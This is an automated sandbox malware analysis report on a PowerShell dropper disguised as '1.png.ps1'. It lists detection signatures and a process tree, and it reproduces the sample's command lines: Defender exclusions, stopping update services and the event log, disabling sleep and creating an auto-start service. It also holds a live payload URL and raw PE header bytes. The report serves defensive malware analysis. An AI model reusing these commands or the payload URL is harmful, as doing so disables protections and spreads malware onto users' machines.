Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.png.ps1

Overview

General Information

Sample name:1.png.ps1
Analysis ID:1577478
MD5:05894847dc478f521e87e2542811af3b
SHA1:85f885241b3f1b8e7f02f0375fbc9704fd135648
SHA256:6b7e8e31e1346fbdff6f98d02e07c69b77b251f85b3b98288086b38c98216da3
Tags:bulletproofps1user-abus3reports
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Found direct / indirect Syscall (likely to bypass EDR)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file contains section with special chars
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 8076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
    • LB31.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Roaming\LB31.exe" MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
      • powershell.exe (PID: 6244 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 412 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 8084 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1076 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1568 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1844 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 2316 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4228 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4252 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 2896 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3008 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dialer.exe (PID: 2988 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
        • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
        • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
        • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
        • svchost.exe (PID: 360 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 792 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeusererSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1040 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1108 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1172 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1216 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1444 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispusererDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1576 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1640 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • sc.exe (PID: 3508 cmdline: C:\Windows\system32\sc.exe delete "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7540 cmdline: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4832 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4812 cmdline: C:\Windows\system32\sc.exe start "LIB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Mig.exe (PID: 3916 cmdline: C:\ProgramData\Mig\Mig.exe MD5: C9E6AA21979D5FC710F1F2E8226D9DFE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1.png.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 8076JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_8076.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        Change of critical system settings

        barindex
        Sigma detected: Disable power options
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 5964, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 4228, ProcessName: powercfg.exe

        System Summary

        barindex
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8076, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7412, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", ProcessId: 8076, ProcessName: powershell.exe
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8076, TargetFilename: C:\Users\user\AppData\Roaming\LB31.exe
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 8076, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\, ProcessId: 7412, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 2988, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 5964, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto", ProcessId: 7540, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1.png.ps1", ProcessId: 8076, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Stop EventLog
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\LB31.exe" , ParentImage: C:\Users\user\AppData\Roaming\LB31.exe, ParentProcessId: 5964, ParentProcessName: LB31.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4832, ProcessName: sc.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://176.113.115.178/FF/M.pngAvira URL Cloud: Label: malware
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\Mig\Mig.exeReversingLabs: Detection: 63%
        Source: C:\Users\user\AppData\Roaming\LB31.exeReversingLabs: Detection: 63%
        Multi AV Scanner detection for submitted file
        Source: 1.png.ps1ReversingLabs: Detection: 21%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\LB31.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\Mig\Mig.exeJoe Sandbox ML: detected
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: LB31.exe, 00000006.00000002.1686134884.00007FF7E75BA000.00000040.00000001.01000000.00000009.sdmp
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB31.exe, LB31.exe, 00000006.00000002.1686134884.00007FF7E75BA000.00000040.00000001.01000000.00000009.sdmp, Mig.exe
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6038DCE0 FindFirstFileExW,35_2_000001FC6038DCE0
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C737DCE0 FindFirstFileExW,41_2_00000161C737DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91EDCE0 FindFirstFileExW,42_2_00000233B91EDCE0
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918EDCE0 FindFirstFileExW,43_2_00000210918EDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E99DCE0 FindFirstFileExW,44_2_000002062E99DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DADCE0 FindFirstFileExW,45_2_00000282B8DADCE0

        Networking

        barindex
        Downloads files with wrong headers with respect to MIME Content-Type
        Source: httpImage file has PE prefix: HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT Accept-Ranges: bytes ETag: "08ec05f1b18db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 18 Dec 2024 13:08:20 GMT Content-Length: 7679488 Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: image/pngLast-Modified: Sun, 06 Oct 2024 18:12:58 GMTAccept-Ranges: bytesETag: "08ec05f1b18db1:0"Server: Microsoft-IIS/10.0Date: Wed, 18 Dec 2024 13:08:20 GMTContent-Length: 7679488Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 53 00 00 10 00 00 00 0c 52 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 66 a3 01 00 00 e0 53 00 00 a4 01 00 00 1c 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 55 00 00 02 00 00 00 c0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 38 00 00 a0 55 00 00 02 00 00 00 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 64 72 79 75 6a 6d 70 00 70 21 00 00 60 8e 00 00 66 21 00 00 c4 53 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 6e 79 75 64 67 75 75 00 10 00 00 00 d0 af 00 00 02 00 00 00 2a 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 10 00 00 00 e0 af 00 00 02 00 00 00 2c 75 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 